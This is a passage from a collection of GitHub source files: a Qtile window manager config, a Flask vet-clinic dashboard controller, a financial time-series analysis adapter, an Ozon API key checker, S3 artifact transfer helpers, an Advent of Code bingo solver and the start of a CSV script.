lazy.spawn(\"pcmanfm\"),\n desc='File Manager'\n ), \n Key([mod], \"Tab\",\n lazy.next_layout(),\n desc='Toggle through layouts'\n ),\n Key([mod1], \"q\",\n lazy.window.kill(),\n desc='Kill active window'\n ),\n Key([mod, \"shift\"], \"r\",\n lazy.restart(),\n desc='Restart Qtile'\n ),\n Key([mod, \"shift\"], \"q\",\n lazy.shutdown(),\n desc='Shutdown Qtile'\n ),\n\n ### Window controls \n Key([mod], \"j\",\n lazy.layout.down(),\n desc='Move focus down in current stack pane'\n ),\n Key([mod], \"k\",\n lazy.layout.up(),\n desc='Move focus up in current stack pane'\n ),\n Key([mod, \"shift\"], \"j\",\n lazy.layout.shuffle_down(),\n lazy.layout.section_down(),\n desc='Move windows down in current stack'\n ),\n Key([mod, \"shift\"], \"k\",\n lazy.layout.shuffle_up(),\n lazy.layout.section_up(),\n desc='Move windows up in current stack'\n ),\n Key([mod], \"h\",\n lazy.layout.shrink(),\n lazy.layout.decrease_nmaster(),\n desc='Shrink window (MonadTall), decrease number in master pane (Tile)'\n ),\n Key([mod], \"l\",\n lazy.layout.grow(),\n lazy.layout.increase_nmaster(),\n desc='Expand window (MonadTall), increase number in master pane (Tile)'\n ),\n Key([mod], \"n\",\n lazy.layout.normalize(),\n desc='normalize window size ratios'\n ),\n Key([mod], \"m\",\n lazy.layout.maximize(),\n desc='toggle window between minimum and maximum sizes'\n ),\n Key([mod, \"shift\"], \"f\",\n lazy.window.toggle_floating(),\n desc='toggle floating'\n ),\n Key([mod], \"f\",\n lazy.window.toggle_fullscreen(),\n desc='toggle fullscreen'\n ),\n\n ### Stack controls\n Key([mod, \"shift\"], \"Tab\",\n lazy.layout.rotate(),\n lazy.layout.flip(),\n desc='Switch which side main pane occupies (XmonadTall)'\n ),\n Key([mod], \"space\",\n lazy.layout.next(),\n desc='Switch window focus to other pane(s) of stack'\n ),\n Key([mod, \"shift\"], \"space\",\n lazy.layout.toggle_split(),\n desc ='Toggle between split and unsplit sides of stack'\n ),\n \n # Sound\n Key([], \"XF86AudioMute\", lazy.spawn(\"amixer -q set Master toggle\")),\n Key([], \"XF86AudioLowerVolume\", lazy.spawn(\"amixer -c 0 sset Master 1- unmute\")),\n Key([], \"XF86AudioRaiseVolume\", lazy.spawn(\"amixer -c 0 sset Master 1+ unmute\")),\n \n # ScreenShots\n Key([], \"Print\", lazy.spawn(\"scrot -q 100 -e 'mv $f /home/abhi/Pictures'\")),\n Key([\"control\"], \"Print\", lazy.spawn('xfce4-screenshooter')),\n Key([\"control\", \"shift\"], \"Print\", lazy.spawn(\"scrot -q 100 -s -e 'mv $f /home/abhi/Pictures'\"))\n]\n\n# Grouping I created -*-\n\n# groups = [Group(i) for i in \"123456789\"]\ngroups = [\n Group('1', label=\"\", matches = [Match(wm_class = \"firefox\")], layout='monadtall'),\n Group('2', label=\"\", matches = [Match(wm_class = \"Code\")], layout='max'),\n Group('3', label=\"\", layout='monadtall'),\n Group('4', label=\"\", matches = [Match(wm_class = \"pcmanfm\")], layout='monadtall'),\n Group('5', label=\"\", matches = [Match(wm_class = \"discord\"), Match(wm_class=\"TelegramDesktop\")], layout='monadtall'),\n Group('6', label=\"\", matches = [Match(wm_class = \"vysor\")], layout='monadtall'),\n Group('7', label=\"\", layout='monadtall'),\n Group('8', label=\"\", layout='monadtall'),\n Group('9', label=\"\", layout='monadtall'),\n Group('0', label=\"\", layout='monadtall')\n ]\n\nfor i in groups:\n keys.extend(\n [\n # mod1 + letter of group = switch to group\n Key(\n [mod],\n i.name,\n lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name),\n ),\n # mod1 + shift + letter of group = switch to & move focused window to group\n Key(\n [mod, \"shift\"],\n i.name,\n lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name),\n ),\n # Or, use below if you prefer not to switch to that group.\n # # mod1 + shift + letter of group = move focused window to group\n # Key([mod, \"shift\"], i.name, lazy.window.togroup(i.name),\n # desc=\"move focused window to group {}\".format(i.name)),\n ]\n )\n\nlayout_theme = {\"border_width\": 0,\n \"margin\": 8,\n \"border_focus\": \"e1acff\",\n \"border_normal\": \"1D2330\"\n }\n\nlayouts = [\n #layout.MonadWide(**layout_theme),\n #layout.Bsp(**layout_theme),\n #layout.Stack(stacks=2, **layout_theme),\n #layout.Columns(**layout_theme),\n #layout.RatioTile(**layout_theme),\n #layout.Tile(shift_windows=True, **layout_theme),\n #layout.VerticalTile(**layout_theme),\n #layout.Matrix(**layout_theme),\n #layout.Zoomy(**layout_theme),\n layout.MonadTall(**layout_theme),\n layout.Max(**layout_theme),\n layout.Stack(num_stacks=2),\n layout.RatioTile(**layout_theme),\n layout.TreeTab(\n font = \"Ubuntu\",\n fontsize = 10,\n sections = [\"FIRST\", \"SECOND\", \"THIRD\", \"FOURTH\"],\n section_fontsize = 10,\n border_width = 2,\n bg_color = \"1c1f24\",\n active_bg = \"c678dd\",\n active_fg = \"000000\",\n inactive_bg = \"a9a1e1\",\n inactive_fg = \"1c1f24\",\n padding_left = 0,\n padding_x = 0,\n padding_y = 5,\n section_top = 10,\n section_bottom = 20,\n level_shift = 8,\n vspace = 3,\n panel_width = 200\n ),\n layout.Floating(**layout_theme)\n]\n\nwidget_defaults = dict(\n font=\"Ubuntu Bold\",\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n top=bar.Bar(\n [\n widget.GroupBox(\n active=gruvbox['fg9'],\n inactive=gruvbox['dark-gray'],\n highlight_method='line',\n block_highlight_text_color=gruvbox['dark-red'],\n borderwidth=0,\n highlight_color=gruvbox['tbg'],\n # background=gruvbox['fg1'],\n fontsize = 16,\n margin_y = 1,\n margin_x = 3,\n padding_y = 0,\n padding_x = 7, \n ),\n \n widget.CurrentLayout(),\n widget.Prompt(),\n widget.WindowName(),\n widget.Chord(\n chords_colors={\n \"launch\": (\"#ff0000\", \"#ffffff\"),\n },\n name_transform=lambda name: name.upper(),\n ),\n widget.Notify(),\n widget.Net(\n format = ' {down} ↓↑ {up}',\n # background=gruvbox['fg1'],\n # foreground=gruvbox['dark-blue']\n ),\n \n widget.Clock(\n # background=gruvbox['fg0'],\n foreground=gruvbox['dark-magenta'],\n format='􏕌 %a, %b %d - %H:%M'\n ),\n # widget.QuickExit(),\n widget.Systray(\n # background=gruvbox['fg0'],\n icon_size = 20,\n ),\n ],\n background=gruvbox['fg0'], size=26, margin=[8, 8, 1, 8], \n ),\n ),\n]\n\n# Drag floating layouts.\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(), start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()),\n Click([mod], \"Button2\", lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *layout.Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\n# If things like steam games want to auto-minimize themselves when losing\n# focus, should we respect this or not?\nauto_minimize = True\n\n# When using the Wayland backend, this can be used to configure input devices.\nwl_input_rules = None\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n\n@hook.subscribe.startup_once\ndef autostart():\n home = os.path.expanduser('~')\n subprocess.Popen([home + '/.config/qtile/autostart.sh'])","repo_name":"gmkng01/My_Arch_work_envirement","sub_path":"Dot_files/.config/qtile/config2.py","file_name":"config2.py","file_ext":"py","file_size_in_byte":11447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"23013744285","text":"from flask import Flask, render_template, request, redirect\nfrom flask import Blueprint\nfrom models.active_case import Active_case \nfrom datetime import date\n\n\nimport repos.active_case_repo as active_case_repo\nimport repos.pet_repo as pet_repo\nimport repos.doctor_repo as doctor_repo\n\nactive_case_blueprint = Blueprint('active_cases', __name__)\n\n@active_case_blueprint.route('/dashboard')\ndef dashboard():\n unfiltered_cases=active_case_repo.select_all()\n doctors = doctor_repo.select_all()\n active_cases = []\n for case in unfiltered_cases:\n if case.check_in == date.today():\n active_cases.append(case)\n \n return render_template('dashboard/index.html', active_cases = active_cases, doctors=doctors)\n\n@active_case_blueprint.route('/dashboard/new')\ndef new_case():\n pets = pet_repo.select_all()\n return render_template('/dashboard/new_case.html', pets=pets)\n\n@active_case_blueprint.route('/dashboard/new', methods=['POST'])\ndef add_case():\n pet = pet_repo.select(request.form['pet_id'])\n active_case = Active_case(request.form['description'], request.form['emergency'], request.form['check_in'], pet, request.form['severity'])\n active_case_repo.save(active_case)\n return redirect('/dashboard')\n\n@active_case_blueprint.route(\"/dashboard/assign/\", methods=['POST'])\ndef assign_case(id):\n doctor = doctor_repo.select(request.form['doctor_id'])\n active_case = active_case_repo.select(id)\n active_case.doctor = doctor\n active_case_repo.update(active_case)\n return redirect('/dashboard')\n\n@active_case_blueprint.route('/dashboard/')\ndef doctor_dashboard(id):\n doctor = doctor_repo.select(id)\n active_cases = active_case_repo.select_all()\n return render_template('/dashboard/doctor_dashboard.html', doctor=doctor, active_cases=active_cases)\n\n@active_case_blueprint.route('/dashboard/dashboard/complete/', methods=['POST'])\ndef complete_case(id):\n case = active_case_repo.select(id)\n case.completed = True\n active_case_repo.update(case)\n return redirect(f'/dashboard/{case.doctor.id}')\n\n@active_case_blueprint.route('/dashboard/dashboard/pend/', methods=['POST'])\ndef pend_case(id):\n case = active_case_repo.select(id)\n case.check_in = request.form['check_in']\n url = case.doctor.id\n case.doctor = None\n active_case_repo.update(case)\n return redirect(f'/dashboard/{url}')","repo_name":"Matt-Matthaiou/Vet_management_project","sub_path":"controllers/active_case_controller.py","file_name":"active_case_controller.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7787658174","text":"import pandas as pd\nimport numpy as np\nfrom fintechlab.TickerSchema import TickerSchema\nfrom fintechlab.DataAnalyzer import DataAnalyzer\nfrom fintechlab.DatabaseAdapter import DatabaseAdapter\n\n#Class used to format data to retain modular independence of analyzer class\nclass AnalyzerAdapter:\n\tdef __init__(self):\n\t\tself.analyzer = DataAnalyzer()\n\t\tself.db = DatabaseAdapter()\n\t\t\t\n\tdef get_all_mean_returns(self, series, days_view=10, short=False, leveredge=1):\n\t\ttype = \"Long\" if not short else \"Short\"\n\t\tlev = \"leveredged * \" + str(leveredge) if leveredge != 1 else \"\"\n\t\tticker_name, start_date, end_date = TickerSchema.get_meta_values(series)\n\t\tticker_name = \"Mean return of \" + type + \" investment in \" + ticker_name + \" over \" + str(days_view) + \" days \" + lev\n\t\tif self.db.dates_are_unavailable(ticker_name, start_date, end_date):\n\t\t\tresults = []\n\t\t\tfor i in range(0, len(series)-days_view, 1):\n\t\t\t\tview = series[\"Value\"].iloc[i:i+days_view].values\n\t\t\t\ti_result = self.analyzer.get_mean_return(view, short, leveredge)\n\t\t\t\tresults.append(i_result)\n\t\t\tresults = np.vstack(results)\n\t\t\tresult = TickerSchema.create(series[\"Date\"].iloc[:days_view*-1], ticker_name, results)\n\t\t\tself.db.insert(result)\n\t\t\treturn result\n\t\telse:\n\t\t\treturn self.db.select_derivitive(ticker_name, start_date, end_date)\n\t\n\tdef get_divergence_from_linear_regression(self, series):\n\t\tseries_r = self.linear_regress_time_series(series)\n\t\tdivergence = series[\"Value\"].values - series_r[\"Value\"].values\n\t\tticker_name = series[\"ticker_name\"] + \" divergence from linear regression\"\n\t\treturn TickerSchema.create(series[\"Date\"], ticker_name, divergence)\n\n\tdef adjust_by_linear_regression(self, series):\n\t\tseries_r = self.linear_regress_time_series(series)\n\t\tseries_r = self.normalize_to_latest(series_r)\n\t\tseries[\"Value\"] = series[\"Value\"] / series_r[\"Value\"]\n\t\treturn series\n\t\t\n\tdef normalize_to_latest(self, series):\n\t\tlatest = series[\"Value\"].iloc[-1]\n\t\tnormalized_series = self.analyzer.normalize_to_x(series[\"Value\"].values, latest)\n\t\tticker_name = series[\"ticker_name\"] + \" normalized to latest value\"\n\t\treturn TickerSchema.create(series[\"Date\"], ticker_name, normalized_series)\n\n\tdef get_series_relation(self, series_one, series_two):\n\t\tticker_name, start_date, end_date = TickerSchema.get_meta_values(series_one)\n\t\tticker_name = str(series_one[\"ticker_name\"].iloc[0] + \" / \" + series_two[\"ticker_name\"].iloc[0])\n\t\tif self.db.dates_are_unavailable(ticker_name, start_date, end_date):\n\t\t\tdate = series_one[\"Date\"]\n\t\t\tticker_name = series_one[\"ticker_name\"] + \" / \" + series_two[\"ticker_name\"]\n\t\t\tvalue = self.analyzer.get_series_relation(series_one[\"Value\"], series_two[\"Value\"])\n\t\t\tresult = TickerSchema.create(date, ticker_name, value)\n\t\t\tself.db.insert(result)\n\t\t\treturn result\n\t\telse:\n\t\t\treturn self.db.select_derivitive(ticker_name, start_date, end_date)\n\t\t\n\tdef linear_regress_time_series(self, series):\n\t\tvalue = np.vstack(series['Value'].values)\n\t\tdate = np.vstack(np.arange(0, len(series['Date'].values)))\n\t\tvalue_pred = self.analyzer.linear_regress_series(value, date)\n\t\treturn TickerSchema.create(series[\"Date\"], series[\"ticker_name\"], value_pred)\n\t\t\n\tdef linear_regress_series(self, series_x, series_y):\n\t\tx_values = np.vstack(series_x['Value'].values)\n\t\ty_values = np.vstack(series_y['Value'].values)\n\t\tvalue_pred = self.analyzer.linear_regress_series(x_values, y_values)\n\t\tticker_name = series_x[\"ticker_name\"].iloc[0] + \"'s linear relationship to \" + series_y[\"ticker_name\"].iloc[0]\n\t\treturn TickerSchema.create(series_x[\"Date\"], ticker_name, value_pred)\n\t\t\n\tdef percent_change_series(self, series, days_increment=5):\n\t\tpercent_change = self.analyzer.percent_change_series(series[\"Value\"].values, days_increment)\n\t\tseries = series[::days_increment]\n\t\treturn TickerSchema.create(series[\"Date\"][1:], series[\"ticker_name\"][1:], percent_change)\n\t\t\n\tdef change_series(self, series, days_increment=5):\n\t\tpercent_change = self.analyzer.change_series(series[\"Value\"].values, days_increment)\n\t\tseries = series[::days_increment]\n\t\treturn TickerSchema.create(series[\"Date\"][1:], series[\"ticker_name\"][1:], percent_change)\n\t\t\n\tdef kernal_density_estimation(self, x_series, y_series, nbins = 64):\n\t\tx_series = x_series[\"Value\"].values\n\t\ty_series = y_series[\"Value\"].values\n\t\treturn self.analyzer.kernal_density_estimation(x_series, y_series, nbins)\n\t\t\n\tdef get_distribution_slice_from_tensor(self, tensor, x_value):\n\t\tx, y , z = tensor\n\t\tx = x[:,0]\n\t\treturn self.analyzer.get_distribution_slice_from_tensor(x, y, z, x_value)\n\t\t\n\tdef get_maximum_vector(self, x_series, y_series):\n\t\treturn self.analyzer.get_maximum_vector(x_series, y_series)\n\t\t\n\tdef get_p_date_on_guassian(self, time_series, date=-1):\n\t\tvalue_today = time_series[\"Value\"].iloc[date]\n\t\tseries = time_series[\"Value\"].values\n\t\treturn self.analyzer.p_on_gaussian(series, value_today)\n\t\n\tdef get_pdf_of_date_on_guassian(self, time_series, date=-1):\n\t\tvalue_today = time_series[\"Value\"].iloc[date]\n\t\tseries = time_series[\"Value\"].values\n\t\treturn self.analyzer.pdf_on_gaussian(series, value_today)\n\t\t\n\tdef gaussian_probability_of_divergence_from_linear_regression(self, data, view, i):\n\t\ti_data = data.iloc[i-view:i]\n\t\ti_data = self.get_divergence_from_linear_regression(i_data)\n\t\ttoday = self.get_p_date_on_guassian(i_data)\n\t\tsign = 1 if (today[1] > 0) else -1\n\t\treturn today[0] * sign\n\t\t\t\n\tdef get_series_of_gaussian_probability_of_divergence_from_linear_regression(self, data, view):\n\t\tticker_name, start_date, end_date = TickerSchema.get_meta_values(data)\n\t\tticker_name = \"Probability of \" + ticker_name + \" divergence from \" + str(view) + \" day linear regression\"\n\t\tif self.db.dates_are_unavailable(ticker_name, start_date, end_date):\n\t\t\tresults = []\n\t\t\tfor i in range(view, len(data), 1):\n\t\t\t\tprobality = self.gaussian_probability_of_divergence_from_linear_regression(data, view, i)\n\t\t\t\tresults.append(probality)\n\t\t\tresults = np.vstack(results)\n\t\t\tresult = TickerSchema.create(data[\"Date\"].iloc[view:], ticker_name, results)\n\t\t\tself.db.insert(result)\n\t\t\treturn result\n\t\telse:\n\t\t\treturn self.db.select_derivitive(ticker_name, start_date, end_date)\n\n\tdef get_gaussian_distribution(self, time_series):\n\t\treturn self.analyzer.gaussian_distribution(time_series[\"Value\"].values)\n\t\t\n\tdef get_beta_distribution(self, time_series):\n\t\treturn self.analyzer.beta_distribution(time_series[\"Value\"].values)\n\t\t\n\tdef get_distributive_gaussian_projection(self, data, projection, forward_length):\n\t\tprojection_values = self.analyzer.distributive_gaussian_projection(data[\"Value\"].values, projection, forward_length)\n\t\tprojection_dates = pd.date_range(start=data[\"Date\"].iloc[-1], periods=forward_length+1)\n\t\tticker_name = data[\"ticker_name\"] + \" \" + str(forward_length) + \" day projection\"\n\t\treturn TickerSchema.create(projection_dates, ticker_name, projection_values)\t\t\n\t\n\t\n\t\n\t","repo_name":"Thomas-Power/fintech-lab","sub_path":"fintechlab/AnalyzerAdapter.py","file_name":"AnalyzerAdapter.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24314940232","text":"all_metrics = ['hits_view_search', 'hits_view_pdp', 'hits_view', 'hits_tocart_search', 'hits_tocart_pdp',\n 'hits_tocart', 'session_view_search', 'session_view_pdp', 'session_view', 'conv_tocart_search',\n 'conv_tocart_pdp', 'conv_tocart', 'revenue', 'returns', 'cancellations', 'ordered_units',\n 'delivered_units', 'adv_view_pdp', 'adv_view_search_category', 'adv_view_all', 'adv_sum_all',\n 'position_category', 'postings', 'postings_premium']\ndef_metrics = [\"ordered_units\", \"cancellations\", \"returns\", \"revenue\", \"delivered_units\"]\nattribute_keys = [\"height\", \"depth\", \"width\", \"dimension_unit\", \"weight\", \"weight_unit\", 'pdf_list', 'attributes']\nlists_to_write1 = ['products', 'prices', 'stocks', 'categories', 'attributes', 'analytics', 'transactions', 'ratings']\nkeys_1 = ['prices', 'stocks', 'ratings', 'categories', 'attributes', 'attribute_values']\nkeys_3 = ['analytics', 'transactions']\nall_keys = ['product_ids', 'prices', 'stocks', 'ratings', 'categories', 'attributes', 'attribute_values', 'analytics',\n 'transactions']\ncompany_data_keys = [\"ozon_client_id\", \"api_key\", \"user_id\", \"id\"]\n\n\ndef check_scenario(scenario):\n for key in all_keys:\n need = scenario.get(key)\n if key in keys_1:\n scenario[key] = False if not isinstance(need, bool) else scenario[key]\n elif key == 'product_ids':\n scenario[key] = scenario[key] if isinstance(need, list) else []\n elif key in keys_3:\n if isinstance(need, dict):\n pass\n elif isinstance(need, bool) and need:\n if key == 'analytics':\n scenario[key] = {'metrics': [], 'period': 1, 'period_step_back': 1}\n else:\n scenario[key] = {'period': 1, 'period_step_back': 1}\n else:\n scenario[key] = {}\n scenario['attribute_values'] = scenario['product_ids'] if scenario['attribute_values'] else False\n return scenario\n\n\n# a = {'product_ids': [1212],\n# 'prices': True,\n# 'stocks': True,\n# 'analytics': {},\n# 'transactions': {'period': 1, 'period_step_back': 1},\n# 'ratings': True,\n# 'categories': True,\n# 'attributes': True,\n# 'attribute_values': []\n# }\n# from pprint import pprint\n#\n# pprint(check_scenario(a), sort_dicts=False)\n\ndef check_company_data(company_data, result=True):\n for key in company_data_keys:\n if not company_data.get(key):\n result=False\n company_data['client_id'] = company_data.pop('ozon_client_id')\n company_data['company_id'] = company_data.pop('id')\n return result","repo_name":"Dmitri123321/ozon_api2","sub_path":"libb/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34191544163","text":"import os\nfrom pathlib import Path\nfrom typing import List, Tuple, Optional, Generator\n\nfrom boto3.s3 import transfer\nfrom botocore.client import BaseClient\nfrom tqdm import tqdm\n\n\ndef dest_file_path(key: str, output_path: Path) -> Path:\n return output_path / \"/\".join(key.split(\"/\")[4:])\n\n\ndef download_run_artifact_files(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str,\n run_name: str, output_dir: Optional[str]):\n artifact_prefix = f\"artifacts/{repo_user_name}/{repo_name}/{run_name},\"\n\n output_path = Path(output_dir or os.getcwd())\n\n total_size = 0\n keys = []\n paginator = s3_client.get_paginator('list_objects')\n page_iterator = paginator.paginate(Bucket=bucket_name, Prefix=artifact_prefix)\n for page in page_iterator:\n for obj in (page.get(\"Contents\") or []):\n key = obj[\"Key\"]\n\n total_size += obj[\"Size\"]\n if obj[\"Size\"] > 0 and not key.endswith(\"/\"):\n keys.append(key)\n\n downloader = transfer.S3Transfer(s3_client, transfer.TransferConfig(), transfer.OSUtils())\n\n # TODO: Make download files in parallel\n with tqdm(total=total_size, unit='B', unit_scale=True, unit_divisor=1024,\n desc=f\"Downloading artifacts\") as pbar:\n def callback(size):\n pbar.update(size)\n\n for i in range(len(keys)):\n key = keys[i]\n\n file_path = dest_file_path(key, output_path)\n file_path.parent.mkdir(parents=True, exist_ok=True)\n\n downloader.download_file(bucket_name, key, str(file_path), callback=callback)\n\n\ndef list_run_artifact_files(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str,\n run_name: str) -> Generator[Tuple[str, str, int], None, None]:\n artifact_prefix = f\"artifacts/{repo_user_name}/{repo_name}/{run_name},\"\n paginator = s3_client.get_paginator('list_objects')\n page_iterator = paginator.paginate(Bucket=bucket_name, Prefix=artifact_prefix)\n for page in page_iterator:\n for obj in (page.get(\"Contents\") or []):\n if obj[\"Size\"] > 0:\n yield obj[\"Key\"].split(\"/\")[4], \"/\".join(obj[\"Key\"].split(\"/\")[5:]), obj[\"Size\"]\n\n\ndef __remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text\n\n\ndef upload_job_artifact_files(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str, job_id: str,\n artifact_name: str, local_path: Path):\n total_size = 0\n for root, sub_dirs, files in os.walk(local_path):\n for filename in files:\n file_path = os.path.join(root, filename)\n file_size = os.path.getsize(file_path)\n total_size += file_size\n\n uploader = transfer.S3Transfer(s3_client, transfer.TransferConfig(), transfer.OSUtils())\n\n with tqdm(total=total_size, unit='B', unit_scale=True, unit_divisor=1024,\n desc=f\"Uploading artifact '{artifact_name}'\") as pbar:\n def callback(size):\n pbar.update(size)\n\n prefix = f\"artifacts/{repo_user_name}/{repo_name}/{job_id}/{artifact_name}\"\n for root, sub_dirs, files in os.walk(local_path):\n for filename in files:\n file_path = Path(os.path.join(root, filename)).absolute()\n\n key = prefix + __remove_prefix(str(file_path), str(local_path.absolute()))\n uploader.upload_file(\n str(file_path),\n bucket_name,\n key,\n callback=callback,\n )\n\n\ndef list_run_artifact_files_and_folders(s3_client: BaseClient, bucket_name: str, repo_user_name: str, repo_name: str,\n job_id: str, path: str) -> List[Tuple[str, bool]]:\n prefix = f\"artifacts/{repo_user_name}/{repo_name}/{job_id}/\" + path + (\"\" if path.endswith(\"/\") else \"/\")\n response = s3_client.list_objects(Bucket=bucket_name, Prefix=prefix, Delimiter=\"/\")\n folders = []\n files = []\n if \"CommonPrefixes\" in response:\n for f in response[\"CommonPrefixes\"]:\n folder_name = f[\"Prefix\"][len(prefix):]\n if folder_name.endswith(\"/\"):\n folder_name = folder_name[:-1]\n folders.append(folder_name)\n if \"Contents\" in response:\n for f in response[\"Contents\"]:\n files.append(f[\"Key\"][len(prefix):])\n return [(folder, True) for folder in folders] + [(file, False) for file in files]\n","repo_name":"michelkok/dstack","sub_path":"cli/dstack/aws/artifacts.py","file_name":"artifacts.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"31660232717","text":"from typing import List\n\n\"\"\"\nCreator: Przemysław Szewczak\nDate: 06.12.2021\nSource: https://adventofcode.com/2021/day/4\n\"\"\"\n\n\nclass Board:\n def __init__(self, row_list: List[List[int]]):\n self.rows = []\n [self.rows.append(i) for i in row_list]\n self.columns = [[], [], [], [], []]\n for row in self.rows:\n for ind, val in enumerate(row):\n self.columns[ind].append(val)\n\n def __str__(self):\n return_string = f'{self.rows[0]}\\n' \\\n f'{self.rows[1]}\\n' \\\n f'{self.rows[2]}\\n' \\\n f'{self.rows[3]}\\n' \\\n f'{self.rows[4]}'\n return return_string\n\n def bingo_check(self, drawn_numbers: List[int]) -> bool:\n \"\"\"\n Checking if typed numbers for a Bingo.\n If yes returning True and printing sum of unmarked numbers times last drawn number\n If no returning False, and another board is checking.\n \"\"\"\n bingo_value = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n for i in drawn_numbers:\n if i in self.rows[0]:\n bingo_value[0] += 1\n\n if i in self.rows[1]:\n bingo_value[1] += 1\n\n if i in self.rows[2]:\n bingo_value[2] += 1\n\n if i in self.rows[3]:\n bingo_value[3] += 1\n\n if i in self.rows[4]:\n bingo_value[4] += 1\n\n if i in self.columns[0]:\n bingo_value[5] += 1\n\n if i in self.columns[1]:\n bingo_value[6] += 1\n\n if i in self.columns[2]:\n bingo_value[7] += 1\n\n if i in self.columns[3]:\n bingo_value[8] += 1\n\n if i in self.columns[4]:\n bingo_value[9] += 1\n for i in bingo_value:\n if i >= 5:\n self.finished = True\n print(f'Bingo: {self.sum_not_typed(drawn_numbers)}')\n return True\n else:\n continue\n\n def sum_not_typed(self, drawn_numbers: List[int]):\n \"\"\"Method summing and returning value if Bingo occurred\"\"\"\n sum_not = 0\n for row in self.rows:\n for val in row:\n if val not in drawn_numbers:\n sum_not += val\n return sum_not * drawn_numbers[-1]\n\n\nclass DrawnNumbers:\n \"\"\"Class for numbers that will return numbers which takes part in Bingo game\"\"\"\n\n def __init__(self):\n \"\"\"Saving all available numbers to one variable then, taking first 5 to drawn number variable\"\"\"\n with open('day_4_input_1.txt', 'r') as file:\n self.available_numbers = file.readline().strip().split(',')\n self.drawn_numbers = list(map(lambda x: int(x), self.available_numbers[:5]))\n self.available_numbers = self.available_numbers[5:]\n\n def __str__(self):\n return_string = f'Drawn numbers: {self.drawn_numbers}\\n' \\\n f'Available numbers: {self.available_numbers}'\n return return_string\n\n def get_drawn_numbers(self) -> List[int]:\n return self.drawn_numbers\n\n def draw_next(self) -> List:\n self.drawn_numbers.append(int(self.available_numbers[0]))\n self.available_numbers = self.available_numbers[1:]\n return self.drawn_numbers\n\n\ndef create_boards() -> List[Board]:\n board_list = []\n with open('day_4_input_1.txt', 'r') as file:\n \"\"\"Skipping first 2 lines - number drawn and gap line\"\"\"\n [file.readline() for _ in range(2)]\n board_rows = []\n for line in file:\n\n board_rows.append(line.strip().split(' '))\n if len(board_rows) == 5:\n \"\"\"Skipping gap line, removing '' from rows, creating Board object,\n saving them and preparing list for another board\"\"\"\n file.readline()\n for i in board_rows:\n if '' in i:\n i.remove('')\n if '' in i:\n i.remove('')\n if '' in i:\n i.remove('')\n rows_to_save = []\n \"\"\" Changing type from str to integer type \"\"\"\n [rows_to_save.append(list(map(lambda x: int(x), i))) for i in board_rows]\n board_list.append(Board(rows_to_save))\n\n board_rows = []\n continue\n return board_list\n\n pass\n\n\ndef main() -> None:\n \"\"\" Creating, and handling drawn numbers and available boards.\"\"\"\n numbers = DrawnNumbers()\n drawn = numbers.get_drawn_numbers()\n boards = create_boards()\n break_while = False\n while True:\n\n for board in boards:\n if board.bingo_check(drawn):\n break_while = True\n break\n else:\n continue\n if break_while:\n break\n numbers.draw_next()\n drawn = numbers.get_drawn_numbers()\n\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Przemoosz/CodeAdvent2021","sub_path":"Day_4_Challange_1.py","file_name":"Day_4_Challange_1.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31461995775","text":"import csv\nimport os\nimport shutil\nimport time\n\n\n#arquivo ready to be coomited\n\narquivoLeitura = open(r\"C:\\Users\\thiag\\Desktop\\bacen\\csv_import\\csv_import.csv\",'r')\nlinhasEntrada = csv.reader(arquivoLeitura)\nitens = []\n\nfor i in linhasEntrada:\n itens += i\n\n\nclass Arquivo_entrada():\n\n def __init__(self,filename):\n self.file_i = filename\n self.arquivoentrada = open(os.path.join(\"C:/Users/thiag/Desktop/bacen/Arquivosbacen\",self.file_i),'r')\n self.linhas = csv.reader(self.arquivoentrada, delimiter = \";\")\n def mostrarlinhas(self):\n for linha in self.linhas:\n print(linha)\n def closeFile(self):\n self.arquivoentrada.close()\n\nclass Arquivo_saida(Arquivo_entrada):\n\n def __init__(self,filename):\n Arquivo_entrada.__init__(self,filename)\n nfile = \"Arquivo Atualizado_\" + filename[-12:-4]+ \".csv\"\n self.file_o = 